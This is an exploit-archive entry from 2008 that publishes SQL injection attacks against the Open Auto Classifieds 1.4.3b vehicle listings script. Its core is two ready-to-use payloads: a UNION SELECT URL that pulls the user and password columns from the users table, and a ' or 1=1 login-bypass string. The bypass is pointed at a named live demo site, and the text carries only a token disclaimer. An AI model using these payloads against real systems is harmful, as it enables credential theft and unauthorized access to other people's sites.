[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities
# Published : 2008-05-02
# Author : InjEctOr5
# Previous Title : phpDirectorySource 1.1 Multiple Remote SQL Injection Vulnerabilities
# Next Title : ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> Kings of injection |
| /___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Remote SQL Injection
Author :: InjEctOr [s0f (at) w.cn]
&& Fisher762 [SQ7 (at) w.cn]
Application :: Open Auto Classifieds vehicle listings manager v1.4.3b
Download :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip
Dork 1 :: use your mind
Greets :: Allah , Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
Expl0!t::
url :
http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
and bypass login:
http://openautoclassifieds.com/login.php << from demo site :)
in Username field just type ' or 1=1 /*
note:
there is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same
# www.Syue.com [2008-05-02]